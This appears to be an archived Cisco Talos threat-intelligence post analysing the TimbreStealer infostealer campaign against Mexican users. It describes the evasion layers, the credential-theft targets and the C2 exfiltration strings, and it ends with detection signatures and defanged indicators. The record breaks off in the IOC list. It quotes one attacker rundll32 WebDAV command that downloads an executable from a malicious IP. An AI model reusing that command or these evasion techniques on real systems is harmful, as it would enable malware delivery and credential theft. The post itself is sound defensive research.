{
	"id": "da58e76c-b3f2-4e88-864b-115534508f31",
	"created_at": "2026-04-06T01:32:07.663916Z",
	"updated_at": "2026-04-10T03:24:18.070336Z",
	"deleted_at": null,
	"sha1_hash": "658e0f6fd16ab07688366e37c17cfd418a0e4e59",
	"title": "TimbreStealer campaign targets Mexican users with financial lures",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1278477,
	"plain_text": "TimbreStealer campaign targets Mexican users with financial lures\r\nBy Jacob Finn\r\nPublished: 2024-02-27 · Archived: 2026-04-06 00:32:12 UTC\r\nCisco Talos has discovered a new campaign operated by a threat actor distributing a previously unknown\r\nmalware we’re calling “TimbreStealer.”\r\nThis threat actor was observed distributing TimbreStealer via a spam campaign using Mexican tax-related\r\nthemes starting in at least November 2023. The threat actor has previously used similar tactics, techniques\r\nand procedures (TTPs) to distribute a banking trojan known as “Mispadu.”\r\nTimbreStealer is a new obfuscated information stealer found targeting victims in Mexico.\r\nIt contains several embedded modules used for orchestration, decryption and protection of the malware\r\nbinary.\r\nTalos has observed an ongoing phishing spam campaign targeting potential victims in Mexico, luring users to\r\ndownload a new obfuscated information stealer we’re calling TimbreStealer, which has been active since at least\r\nNovember 2023. This campaign uses phishing emails with financial themes, directing users to a compromised\r\nwebsite where the payload is hosted and tricking them into executing the malicious application.\r\nTalos has observed new distribution campaigns being conducted by this threat actor since at least September 2023,\r\nwhen they were initially distributing a variant of the Mispadu banking trojan using geofenced WebDAV servers\r\nbefore changing the payload to this new information-stealer. After the threat actor changed to this new stealer, we\r\nhaven’t found any evidence of Mispadu being used anymore.\r\nThe phishing campaign uses geofencing techniques to only target users in Mexico, and any attempt to contact the\r\npayload sites from other locations will return a blank PDF file instead of the malicious file. The current spam run\r\nwas observed to mainly use Mexico's digital tax receipt standard called CDFI (which stands for “Comprobante\r\nFiscal Digital por Internet,” or online fiscal digital invoice in English). Talos has also observed emails using\r\ngeneric invoice themes used for the same campaign. \r\nAlthough we could not find hard evidence linking the two campaigns, we assess with high confidence they are\r\noperated by the same threat actor, based on the same TTPs observed in this campaign and the previous activity\r\ndistributing Mispadu, and the fact that once TimbreStealer started being distributed, we could not find any more\r\nevidence of Mispadu being used. \r\nTimbreStealer, a new obfuscated information stealer\r\nTalos has identified a new family of information stealers while investigating a spam campaign targeting Mexican\r\nusers starting in November 2023. The name TimbreStealer is a reference to one of the themes used in the spam\r\ncampaign which we will analyze later.\r\nTimbreStealer exhibits a sophisticated array of techniques to circumvent detection, engage in stealthy execution,\r\nand ensure its persistence within compromised systems. This includes leveraging direct system calls to bypass\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 1 of 36\n\nconventional API monitoring, employing the Heaven’s Gate technique to execute 64-bit code within a 32-bit\r\nprocess, and utilizing custom loaders. These features indicate a high level of sophistication, suggesting that the\r\nauthors are skilled and have developed these components in-house.\r\nSnippet of code showing how Heaven’s Gate 64-bit switch is executed\r\nThe sample we’re analyzing was found on a victim machine following a visit to a compromised website after the\r\nusers clicked on a link present in a spam email. \r\nSample used during this blog analysis\r\nOur analysis identified several modules embedded in the malware’s “.data” section, and a complex decryption\r\nprocess involving a main orchestration DLL and a global decryption key which is used throughout the different\r\nmodules and updated at each stage. While this analysis is not yet complete, we wanted to describe at least the\r\ninitial modules and their relationship.\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 2 of 36\n\nTimbreStealer’s Decryption Process \r\nThis first layer executable is packed and includes an embedded DLL in its “.data” section. The loader will first\r\nscan Ntdll for all of the Zw* exports and build an ordered hash table of the functions. All sensitive APIs from this\r\npoint will be called with direct system calls into the kernel. For 64-bit machines, this will include a transition from\r\n32-bit to 64-bit mode through Heaven’s Gate before the syscall is issued. \r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 3 of 36\n\nSnippet of code showing the two different method used by TimbreStealer to execute system calls to\r\nhide API usage.\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 4 of 36\n\nOnce this is complete, it will then decrypt the next stage payload from the .data section. The decrypted DLL has\r\nits MZ header and PE signature wiped, a technique we will see throughout this malware. A custom PE loader now\r\nlaunches the DLL passing the Zw* hash table as an argument to its exported function. \r\nDecryption of all submodules makes use of a global decryption key. As the execution of the malware progresses,\r\nthis key is encrypted over and over again. If execution does not follow every step of the expected path, the\r\ndecryption key will get out of sync and all subsequent decryptions will fail. \r\nThis prevents reverse engineers from short-cutting the logic to force decryptions or statically extracting arguments\r\nto access the payloads. This means every anti-analysis check has to be located and circumvented. Encryption\r\nrounds on the global key are scattered about in the code and even occur from within the different sub-modules\r\nthemselves. \r\nAll stages of this malware use the same coding style and techniques. We therefore assess with high confidence that\r\nall obfuscation layers and final payload were developed by the same authors. \r\nTimbreStealer’s embedded modules\r\nOnce the initial layer is extracted, TimbreStealer will check if the system is of interest and whether or not it’s\r\nbeing executed in a sandbox environment. It will also extract the many submodules embedded in the payload.\r\nTalos identified at least three different layers after the main payload was extracted, with several modules in each\r\nlayer used for different functions:\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 5 of 36\n\nDiagram showing the different module relationships in TimbreStealer.\r\nThe second stage of the malware is the orchestrator layer, which is responsible for detecting systems of interest\r\nand extracting all subsequent modules. To determine if the system is of interest to the attackers, the malware first\r\nchecks that the system language is not Russian, and then checks the timezone to ensure it is within a Latin\r\nAmerican region. This is followed by CsrGetProcessId debugger checks and counting desktop child windows to\r\nensure it is not running in a sandbox environment. \r\nAt this stage the malware will also do a mutex check, look for files and registry keys that may be indicative of\r\nprevious infection, and scan the system browsers for signs of natural use. The files and registry keys checked by\r\nthe malware include the non-exhaustive list below:\r\nHKLM\\SOFTWARE\\Microsoft\\CTF\\TIP\\{82AA36AD-864A-2E47-2E76-9DED47AFCDEB}\r\n{A0E67513-FF6B-419F-B92F-45EE8E03AEEE} = \u003cvalue\u003e\r\n{E77BA8A1-71A1-C475-4F73-8C78F188ACA7} = \u003cvalue\u003e\r\n{DB2D2D69-9EE0-9A3C-2924-67021A31F870} = \u003cvalue\u003e\r\n{6EF3E193-61BF-4F68-9736-51CF6905709D} = \u003cvalue\u003e\r\n{3F80FA11-1693-4D05-AA83-D072E69B77FC} = \u003cvalue\u003e\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 6 of 36\n\n{419EEE13-5039-4FA4-942A-ADAE5D4ED5C3} = \u003cvalue\u003e\r\nC:\\Windows\\Installer\\{E1284A06-8DFA-48D4-A747-28ECD07A2966}\r\nGlobal\\I4X1R6WOG6LC7APSPY1YAXZWJGK70AZARZEGFT3U\r\nThe presence of these keys along with other checks mentioned before will prevent the execution of the remaining\r\nstages of the malware.\r\nThe orchestrator contains four other encrypted sub-modules within it. \r\nIDX Size CRC32 Purpose\r\n0 8kb 0xF25BEB22 Shellcode loader for stripped DLLs\r\n1 100kb 0xEB4CD3EC  DLL - not analyzed yet\r\n2 60kb 0xFA4AA96B DLL - Anti-vm and anti-analysis, system of interest checks\r\n3 3.92mb 0xAB029A74 DLL - Installer with encrypted payload\r\nAll blobs are accessed through a parent loader function which verifies the expected Zlib CRC32 hash of data and\r\ncan optionally decompress the raw data if specified. This overall architecture has been observed in all layers. \r\nEach stripped DLL is loaded by a custom shellcode loader from submodule #0 (IDX = 0). Execution is transferred\r\nto this shellcode through a Heaven’s Gate stub using the ZwCreateThreadEx API.\r\nSnippet of code showing how TimbreStealer execute the embedded shellcode modules\r\nSubmodule No. 2 is an anti-analysis DLL that performs several checks and does scattered rounds of encryption on\r\nthe global decrypt buffer. If any check fails, the installer module will not decrypt properly. Checks in this layer\r\ninclude:\r\nVMWare hook and port checks.\r\nVpcext, IceBP, int 2D instructions to detect debuggers.\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 7 of 36\n\nChecking physical drive for strings: qemu, virtual, vmware, vbox, xensrc, sandbox, geswall, bufferzone,\r\nsafespace, virtio, harddisk_ata_device, disk_scsi_disk_device, disk_0_scsi_disk_device, nvme_card_pd,\r\ngoogle_persistentdisk.\r\nIf all of these checks complete as expected, then the final module can be decrypted successfully. \r\nSubmodule No. 3 is the installer layer, which will drop several files to disk and trigger execution. A benign decoy\r\ndocument will also be displayed to help defer suspicion. \r\nFiles dropped by the payload installer module after machine of interest checks passed\r\nExecution is triggered by registering a task through the ITaskService COM interface. The scheduled task uses\r\nMicrosoft’s reg.exe to add a run once registry key, and then trigger rundll32.exe to process this entry through the\r\nsystem iernonce.dll.\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 8 of 36\n\nScheduled Task configuration to run the installed DLL\r\nUnder certain conditions, this layer can also modify Group Policy options to set startup scripts.\r\nTimbreStealer’s Installed DLL modules \r\nThe installed DLL named Cecujujajofubo475.dll uses the same overall architecture as the first DLL detailed\r\nabove, with all of its internal strings encrypted, uses a global decrypt buffer, and uses a different Zw* API hash\r\ntable to perform direct syscalls avoiding user API. \r\nIn this layer there are also TLS callbacks to add complexity to global decrypt buffer encryption. An extra round of\r\nencryption has also been added that depends on the parent process name and value within the registry key given\r\nabove to prevent analysis on 3rd party machines. \r\nThis DLL contains eight encrypted sub-modules within it:\r\nIDX Size CRC32 Purpose\r\n0 0x1000 0x2B80E901 Single XOR function accepting 5 arguments\r\n1 0x1000 0x520200E8 x64 shellcode PE loader\r\n2 0x2000 0x105542F7 x86 shellcode PE loader\r\n3 0x2000 0xC4ECE0A8 Unknown shellcode\r\n4 0x7600 0xC1384E15 Unknown module, seems to be used to decompress other blobs\r\n5 0xD800* 0x1D38B250 Anti-VM/Sandbox layer \r\n6 0x1B600* 0x4F1FEFE3 x86 DLL to extract main payload\r\n7 0x1EE00* 0xF527AC18 x64 DLL to extract main payload\r\n(*) indicates the blob is decompressed after decryption. The column shows the decompressed size.\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 9 of 36\n\nWhile this DLL contains many of the same protections found in the installation phase, several more have been\r\nidentified in this layer. The first is a patch to the ZwTraceEvent API to disable user mode Event Tracing for\r\nWindows data collection. \r\nAnother interesting protection overwrites all of the loaded DLLstwo-stagein the process with clean copies from\r\nthe that disk. This will wipe all Antivirus vendor user mode hooks, software breakpoints, and user patches during\r\nexecution. \r\nThis DLL serves as a loader for the final payload which is housed within the ApplicationIcon.ico file shown in the\r\nprevious relationship diagram. Submodule No. 7 will be the default loader that Submodule attempts to launch.\r\nThey attempt to inject this 64-bit DLL into a preferred list of svchost.exe processes. \r\nThe order of preference is based on svchost.exe process command line, looking for the following strings: \r\nDcomLaunch \r\nPower \r\nBrokerInfrastructure \r\nLSM \r\nSchedule \r\nIf the injections into svchost.exe fail, then a backup 32-bit fallback shellcode is also available. In this mode a two-stage shellcode is loaded from sub-module No. 6 and execution is transferred to it. A new thread is created using\r\nsyscalls with a modified context, and then ResumeThread triggers its execution. All memory allocations for the\r\nshellcode are also executed through the syscall mechanism set up earlier. \r\nThe first stage of the shellcode will decrypt its second stage, and then extract and decrypt the final payload DLL\r\nfrom the ApplicationIcon.ico file. The 32 bit version will again use a custom PE loader to directly load and run the\r\nfinal payload DLL within its own process after extraction.\r\nTimbreStealer’s Final Payload Module\r\nThe architecture of this layer is the same as all of the previous and contains an additional nine sub-modules.\r\nAnalysis of this final payload module and submodules is still ongoing at the time of writing:\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 10 of 36\n\nIDX Size CRC32 Purpose\r\n0 0x1000 0x2B80E901 \r\nSingle XOR function accepting 5 arguments. Matches the\r\nprevious layer blob #0\r\n1 0x1000 0x520200E8  x64 shellcode PE loader. Matches the previous layer blob #1\r\n2 0x2000 0x105542F7 x86 shellcode PE loader. Matches the previous layer blob #2\r\n3 0x2000 0xC4ECE0A8 Unknown shellcode. Matches the previous layer blob #3\r\n4 0xA5000* 0xB0214A74 Not yet analyzed\r\n5 0x13CC00* 0xE8421ADE Not yet analyzed\r\n6 0x16800* 0xD30A298E Not yet analyzed\r\n14 0x16600* 0x55BFB99 Not yet analyzed\r\n15 0x7C800* 0x2F6F928D Not yet analyzed\r\n(*) indicates the blob is decompressed after decryption. The column shows the decompressed size.\r\nThe following is a preliminary analysis of the malware features based on the strings we were able to decrypt from\r\nthis module. They indicate the malware can collect a variety of information from the machine and post data to an\r\nexternal website, which is typical behavior of an information stealer. \r\nCollect credential information from the victim’s machine\r\nThe following strings were found in functions scanning files and directories. This module also embeds the SQLite\r\nlibrary to handle different browsers' credential storage files.\r\nCloudManagementEnrollmentToken\r\nGoogle\\\\Chrome Beta\\\\User Data\r\nGoogle\\\\Chrome Dev\\\\User Data\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 11 of 36\n\nGoogle\\\\Chrome SxS\\\\User Data\r\nGoogle\\\\Chrome\\\\User Data\r\nGoogle\\\\Policies\r\nMicrosoft\\\\Edge Beta\\\\User Data\r\nMicrosoft\\\\Edge Dev\\\\User Data\r\nMicrosoft\\\\Edge\\\\User Data\r\nSoftware\\\\Google\\\\Chrome\r\nSoftware\\\\Google\\\\Chrome\\\\Enrollment\r\nSoftware\\\\Google\\\\Enrollment\r\nSoftware\\\\Google\\\\Update\\\\ClientState\\\\{430FD4D0-B729-4F61-AA34-91526481799D}\r\nSOFTWARE\\\\Microsoft\\\\Cryptography\r\nSoftware\\\\Policies\\\\Google\\\\Chrome\r\nSoftware\\\\Policies\\\\Google\\\\Update\r\nhistory\r\nfeeds\r\nfeeds cache\r\ninternet explorer\r\nmedia player\r\noffice\r\nOneDrive\r\npackages\r\nSkydrive\r\nFormhistory.sqlite\r\nSELECT count(`place_id`) FROM `moz_historyvisits` WHERE `place_id` = %I64u;\r\nSELECT `id`, `url`, `visit_count` FROM `moz_places` WHERE `last_visit_date`\r\nMozilla\\\\Firefox\\\\Profiles\\\\\r\nThunderbird\\\\Profiles\\\\\r\nPostbox\\\\Profiles\\\\\r\nPostboxApp\\\\Profiles\\\\\r\nSOFTWARE\\\\Mozilla\\\\Mozilla Firefox\r\nSOFTWARE\\\\Mozilla\\\\Mozilla Thunderbird\r\nSOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\ProfileList\r\nSearch for Files\r\nThe malware also scans several directories looking for files although it’s not clear yet for what purpose. We can\r\nsee in the list below folders related to AdwCleaner, Avast Scanner as well as 360 Antivirus quarantine folders. \r\nAnother set of interesting strings in this list are “.Spotlight-V100” and “.fseventsd” which are related to MacOS.\r\n$360Section\r\n$AV_ASW\r\n$GetCurrent\r\n$Recycle.Bin\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 12 of 36\n\n$SysReset\r\n$WinREAgent\r\n.fseventsd\r\n.Spotlight-V100\r\nAdwCleaner\r\nAMD\r\nAutodesk\r\nboot\r\nBrother\r\nConfig.Msi\r\nDocuments and Settings\r\nEFI\r\nHewlett-Packard\r\ninetpub\r\nIntel\r\nMSOCache\r\nPerfLogs\r\nProgram Files\r\nProgram Files (x86)\r\nProgramData\r\nRecovery\r\nRecoveryImage\r\nResources\r\nSWSetup\r\nSystem Volume Information\r\nSYSTEM.SAV\r\n~MSSETUP.T\r\n$WINDOWS.\r\nAutoKMS\r\nKMSAuto\r\nUsers\r\nAppData\\\\Local\r\nAppData\\\\Roaming\r\nDesktop\r\nDocuments\r\nDownloads\r\nOneDrive\r\nDropbox\r\nCollect OS information\r\nTimbreStealer uses the Windows Management Instrumentation (WMI) interface and registry keys to collect a\r\nwealth of information about the machine where it’s running.\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 13 of 36\n\nOS Information: Description, IdentifyingNumber, Manufacturer, Name, Product, ReleaseDate, InstallDate,\r\nInstallTime\r\nSMB BIOS information: SMBIOSBIOSVersion, SMBIOSMajorVersion, SMBIOSMinorVersion,\r\nSerialNumber, Vendor, Version\r\nHardware information: Win32_ComputerSystemProduct, Win32_BaseBoard, Win32_Bios,\r\nWin32_PhysicalMemory\r\nNetwork Domain Information: StandaloneWorkstation, MemberWorkstation, StandaloneServer,\r\nMemberServer, BackupDomainController, PrimaryDomainController\r\nApplication information: DisplayName, Publisher, DisplayVersion, OSArchitecture\r\nSearch for file extensions\r\nThe code also looks for a specific list of file extensions. Note that the extension “.zuhpgmcf” below is not\r\nassociated with any known file type. This may be indicative of a file that is created by the malware itself.\r\n.bak, .fbk, .dat, .db, .cmp, .dbf, .fdb, .mdf, .txt, .cer, .ods, .xls, .xlsx, .xml, .zuhpgmcf\r\nLook for URLs Accessed\r\nThe strings below represent URLs of interest to the malware. It also contains mentions of a virtual device used to\r\ncapture network packets, which may be indicative that the malware can do network sniffing.\r\nnpf\r\nnpcap\r\nnpcap_wifi\r\nwww.google.com\r\namazon.com\r\ndropbox.com\r\nlinkedin.com\r\ntwitter.com\r\nwikipedia.org\r\nfacebook.com\r\nlogin.live.com\r\napple.com\r\nwww.paypal.com\r\nDisable System Protections\r\nThe malware executes calls to a function used to remove System Restore points on the machine. This is a typical\r\nbehavior of Ransomware malware although Talos have not observed any Ransomware activity on infected\r\nvictims. Additional analysis is still needed in order to confirm or discard this hypothesis. \r\nSELECT * FROM SystemRestore\r\nSequenceNumber\r\nSrClient.dll\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 14 of 36\n\nSRRemoveRestorePoint\r\nSYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\Power\r\nHiberbootEnabled\r\nLook for Remote Desktop Software\r\nThe malware attempts to access services and Mutex used by Remote Desktop servers. It’s not clear yet how this is\r\nused in the payload code.\r\nconsole\r\nTermService\r\nGlobal\\\\TermSrvReadyEvent\r\nwinlogon.exe\r\nconsole\r\nPOST data to remote site\r\nA list of URLs along with strings used in HTTP communication was found in functions accessing the network.\r\nThese URLs don’t conform to the format of other URLs used in the distribution of TimbreStealer. We believe\r\nthese to be the command and control servers used by the malware, but so far, the samples we analyzed have not\r\ncommunicated back to any of them. \r\nPOST\r\nPUT\r\nContent-Disposition: form-data; name=\"\r\n\"; filename=\"\r\n\"\\\\r\\\\nContent-Type: application/octet-stream\\\\r\\\\n\r\nContent-Type: multipart/form-data; boundary=\r\nMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nMozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko\r\nHTTP/1.1 200 OK\\\\r\\\\nDate: %s %s GMT\\\\r\\\\nConnection: Close\\\\r\\\\nAccess-Control-Allow-Origin:\r\n*\\\\r\\\\nAccess-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept\\\\r\\\\nContent-Type: text/plain;charset=UTF-8\\\\r\\\\n\\\\r\\\\n\r\nhttps://hamster69[.]senac2021[.]org/~armadillo492370/\r\nhttps://snapdragon50[.]crimsondragonemperor[.]com\r\n/~aster963249/https://69[.]64[.]35[.]1/~route649289/\r\nThese strings are just a small piece of this puzzle, and more analysis is required on the final payload and its\r\nembedded modules to understand their exact purpose.\r\nPrevious Mispadu spam campaign\r\nActivity associated with these current distribution campaigns was first observed in September 2023 when the\r\nthreat group was distributing a variant of the Mispadu information stealer. This campaign was using compromised\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 15 of 36\n\nwebsites to distribute a Zip archive containing a “.url” file which used a WebDAV file path to execute an\r\nexternally hosted file upon the victim double clicking on it. \r\nInternet shortcut (.url) file used in the Mispadu campaign.\r\nBoth URLs are remote UNC paths and use a port specification of “@80” to force the connection to occur via\r\nWebDAV. This connection is performed by Rundll32.exe with the parameters shown in the example below:\r\nrundll32.exe C:\\Windows\\system32\\davclnt.dll,DavSetCookie 159[.]89[.]50[.]225@80\r\nhttp://159[.]89[.]50[.]225/formato23/9577710738/1242144429.exe \r\nDuring the campaign, all WebDAV servers were geofenced to allow connections only from IP addresses located in\r\nMexico.\r\nThe .url files were named in multiple ways but almost always contained “RFC,” a reference to the Registro\r\nFederal de Contribuyentes (Federal Taxpayers Registry), suggesting the lure was financially related. The .url file\r\nnames also typically contained 6 random digits. \r\nThe Mispadu payload contained a hardcoded C2 address which used HTTPS as communication protocol. We have\r\nseen a variety of C2 URLs, changing up over time but keeping a similar pattern pointing to “it.php” with two\r\nparameters “f” and “w”: \r\nhxxps://trilivok[.]com/2ysz0gghg/cbt0mer/it.php?f=2\u0026w=Windows%2010 \r\nhxxps://trilivok[.]com/3s9p2w9yy/bvhcc5x/it.php?f=9\u0026w=Windows%2010\r\nhxxps://chidoriland[.]com/1r49ucc73/hs4q07q/it.php?f=2\u0026w=Windows%2010\r\nhxxps://manderlyx[.]com/cruto/it.php?f=2\u0026w=Windows%2010\r\nhxxps://bailandolambada[.]com/5iplivg7q/gn4md5c/it.php?f=2\u0026w=Windows%2010\r\nWe observed this campaign to be active until the middle of November, at which time a new payload with\r\nTimbreStealer was dropped on the victim's computers from the compromised website.\r\nThe target industries of this campaign is spread around different verticals with a slight focus on manufacturing and\r\ntransportation as we can see below:\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 16 of 36\n\nGraph showing the most targeted industries in the Mispadu campaign.\r\nSpam campaign using CDFI as lure\r\nTalos detected a low-volume campaign using CDFI to lure users to download and execute a malicious file\r\ndisguised as a PDF document starting around the middle of November and still ongoing as of February 2024.\r\nCDFI is a mandatory electronic invoice standard used in Mexico for purposes of Tax reporting. In this campaign, a\r\nspam email was used as the lure to redirect users to a malicious web page hosted on compromised websites.\r\nExample of a spam email distribution the new TimbreStealer malware\r\nThe Subjects we observed in this campaign follow the same theme:\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 17 of 36\n\nRecibió un Comprobante Fiscal Digital (CFDI). Folio Fiscal: fcd7bf2f-e800-4ab3-b2b8-e47eb6bbff8c\r\nRecibió una Factura. Folio Fiscal: 050e4105-799f-4d17-a55d-60d1f9275288\r\nThe website uses Javascript to detect characteristics of the user such as geolocation and browser type and then\r\ninitiates the download of a Zip file containing a .url file, which in turn will download the initial TimbreStealer\r\ndropper using WebDAV. The Zip file is usually named following the same theme:\r\nCFDI_930209.zip\r\nFACTURA_560208.zip\r\nIn case the access does not come from Mexico, a blank PDF is served instead of the malicious payload.\r\nMessage displayed after the user visits the site where the initial dropper malware is downloaded.\r\nAll the URLs for this current campaign follow a similar format:\r\nhxxps://\u003csome\u003e.\u003ccompromised\u003e[.]\u003cweb\u003e/\u003ctoken\u003e/\u003c14_char_hex_id\u003e\r\nWhere \u003ctoken\u003e above is one of the following strings: “cfdi”, “factura”, “timbreDigital”,  “facdigital” or\r\n“seg_factura”. The first part of the domain is also a random Spanish word related to digital invoices followed by\r\ntwo numbers.\r\nhxxps://pdf85[.]miramantolama[.]com/\r\nfactura/74f871b7ca1977\r\nhxxps://suscripcion24[.]facturasonlinemx[.]com/\r\nfactura/d6a6f8208ed508\r\nhxxps://suscripcion65[.]g1ooseradas[.]buzz/\r\nfactura/9f03d9ef3d73b5\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 18 of 36\n\nhxxps://timbrado11[.]verificatutramite[.]com/\r\nfacdigital/f7640878ebc0f9\r\nThe .url file this time contains more obfuscation intended to make detection by Antivirus products more difficult,\r\nyet it still uses WebDAV via HTTP to download the malicious file and an icon representing a PDF file:\r\nInternet shortcut (.url) file used in the TimbreStealer campaign\r\nUser interaction is required to open the downloaded Zip file and double-click on the .url file for the malware to\r\nexecute, at which point the TimbreStealer main infection will start.\r\nATT\u0026CK TTPs Used in TimbreStealer Campaign\r\nATT\u0026CK ID Description\r\nT1566.002 Spearphishing Link\r\nT1566.001 Spearphishing Attachment\r\nT1204.002 Malicious File\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 19 of 36\n\nT1105 Ingress Tool Transfer\r\nT1190 Exploit Public-Facing Application\r\nT1071.001 Web Protocols\r\nT1036.005 Masquerading: Match Legitimate Name or Location\r\nT1483 Domain Generation Algorithms \r\nT1071 Application Layer Protocol\r\nT1027.009 Obfuscated Files or Information: Embedded Payloads\r\nT1027.010 Obfuscated Files or Information: Command Obfuscation\r\nT1027.002 Obfuscated Files or Information: Software Packing\r\nT1564.001 Hide Artifacts: Hidden Files and Directories\r\nT1497.003 Virtualization/Sandbox Evasion: Time Based Evasion\r\nT1497.001 Virtualization/Sandbox Evasion: System Checks\r\nT1497.002 Virtualization/Sandbox Evasion: User Activity Based Checks\r\nT1055.002 Process Injection: Portable Executable Injection\r\nT1055.001 Process Injection: Dynamic-link Library Injection\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 20 of 36\n\nT1055.012 Process Injection: Process Hollowing\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1574.002 Hijack Execution Flow: DLL Side-Loading\r\nT1082 System Information Discovery\r\nT1486 Data Encrypted for Impact\r\nT1070.001 Indicator Removal: Clear Windows Event Logs\r\nT1012 Query Registry\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1204 User Execution: Malicious File\r\nT1053.003 Scheduled Task/Job: Cron\r\nT1053.005 Scheduled Task/Job: Scheduled Task\r\nT1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nT1112 Modify Registry\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 21 of 36\n\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nThe following Snort SIDs are applicable to this threat: 63057 - 63072 and 300840 - 300844.\r\nThe following ClamAV signatures have been released to detect malware artifacts related to this threat:\r\nWin.Infostealer.TimbreStealer-10021027-0\r\nWin.Infostealer.TimbreStealer-10021026-0\r\nWin.Infostealer.Generic-10017202-0\r\nWin.Packed.Generic-10019162-0\r\nWin.Dropper.Generic-10017203-0\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 22 of 36\n\nIndicators of Compromise\r\nIOCs for this research can be found in our GitHub repository here.\r\nPotential C2 URLs\r\nhxxps://hamster69[.]senac2021[.]org/~armadillo492370/\r\nhxxps://snapdragon50[.]crimsondragonemperor[.]com/~aster963249/\r\nhxxps://69[.]64[.]35[.]1/~route649289/\r\nIPs\r\n24[.]199[.]98[.]128\r\n159[.]89[.]50[.]225\r\n104[.]131[.]169[.]252\r\n104[.]131[.]67[.]109\r\n137[.]184[.]108[.]25\r\n137[.]184[.]115[.]230\r\n138[.]197[.]34[.]162\r\n142[.]93[.]50[.]216\r\n143[.]244[.]144[.]166 \r\n143[.]244[.]160[.]115\r\n146[.]190[.]208[.]30\r\n157[.]230[.]238[.]116\r\n157[.]245[.]8[.]79\r\n159[.]223[.]96[.]160\r\n159[.]89[.]226[.]127\r\n159[.]89[.]90[.]109\r\n162[.]243[.]171[.]207\r\n167[.]71[.]24[.]13\r\n167[.]71[.]245[.]175\r\n167[.]71[.]246[.]120\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 23 of 36\n\n192[.]241[.]141[.]137\r\n24[.]144[.]96[.]15\r\n45[.]55[.]65[.]159\r\n64[.]225[.]29[.]249\r\nDrop Site 